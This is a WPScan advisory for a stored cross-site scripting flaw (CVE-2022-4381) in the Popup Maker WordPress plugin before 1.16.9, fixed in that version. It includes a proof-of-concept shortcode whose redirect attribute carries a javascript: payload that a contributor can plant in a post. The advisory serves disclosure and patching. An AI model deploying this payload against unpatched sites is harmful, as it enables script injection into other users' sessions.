WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Popup Maker < 1.16.9 - Contributor+ Stored XSS via Subscription Form

Description

The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the following shortcode in a post/page

[pum_sub_form name_field_type="fullname" label_name="Name" label_email="Email" label_submit="Subscribe" placeholder_name="Name" placeholder_email="Email" form_layout="block" form_alignment="center" form_style="default" privacy_consent_enabled="yes" privacy_consent_label="Notify me about related content and special offers." privacy_consent_type="radio" privacy_consent_radio_layout="inline" privacy_consent_yes_label="Yes" privacy_consent_no_label="No" privacy_usage_text="If you opt in above we use this information send related content, discounts and other special offers." redirect_enabled redirect="javascript:alert(/XSS/)"] 

The XSS will be triggered when previewing/viewing the post/page and submitting the form

Affects Plugins

popup-maker
Fixed in version 1.16.9

References

CVE
CVE-2022-4381

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

An Doan

Submitter

An Doan

Verified

Yes

WPVDB ID
8bf8ebe8-1063-492d-a0f9-2f824408d0df

Timeline

Publicly Published

2022-09-23 (about 6 months ago)

Added

2022-12-09 (about 3 months ago)

Last Updated

2022-12-09 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin